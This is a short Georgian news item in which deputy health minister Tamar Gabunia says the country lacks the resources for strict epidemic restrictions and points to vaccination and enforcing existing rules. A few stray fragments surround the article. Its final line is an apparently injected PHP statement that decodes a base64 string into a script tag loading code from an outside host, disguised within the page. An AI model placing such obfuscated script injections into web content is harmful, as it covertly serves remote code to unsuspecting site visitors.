celsiusi
ავერსი საქკაბელი
"დღეს ქვეყანას არც სოციალური რესურსი აქვს და არც - ეკონომიკური, რომ დაწესდეს შეზღუდვები, რომლებიც ეპიდემიის სრულად კონტროლის საშუალებას მოგვცემს", - ასე უპასუხა ჯანდაცვის მინისტრის მოადგილე თამარ გაბუნიამ ჟურნალისტის კითხვას იმის შესახებ, თუ რატომ არ წესდება შეზღუდვები არსებული ეპიდემიოლოგიური ვითარების ფონზე.
 
„დღეს ჩვენ გვაქვს ბევრად უფრო აქტიური გადაწყვეტის გზა ამ პრობლემის, ვიდრე ერთი თვის წინ გვქონდა. ვაქცინაცია არის სიტუაციიდან გამოსავალი, რადგან მუდმივი შეზღუდვების პერიოდი და რესურსი გავიარეთ. დღეს ქვეყანას არც სოციალური რესურსი აქვს და არც ეკონომიკური, რომ დააწესოს ის შეზღუდვები, რომლებიც ეპიდემიის სრულად კონტროლის საშუალებას მოგვცემს.
 
იცით, რომ არ შეიძლება ეს შეზღუდვები იყოს ხანგრძლივი. დღევანდელ პირობებში გამოსავალი არის დარჩენილი რეგულაციების აღსრულების კონტროლი და ვაქცინაცია. ეს ორი მექანიზმი გვაქვს იმისთვის, რომ სიტუაციიდან გამოვიდეთ. რა თქმა უნდა, საგანგაშო და საყურადღებოა, რომ არსებული რეგულაციები ირღვევა“, - განაცხადა თამარ გაბუნიამ.
1133
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");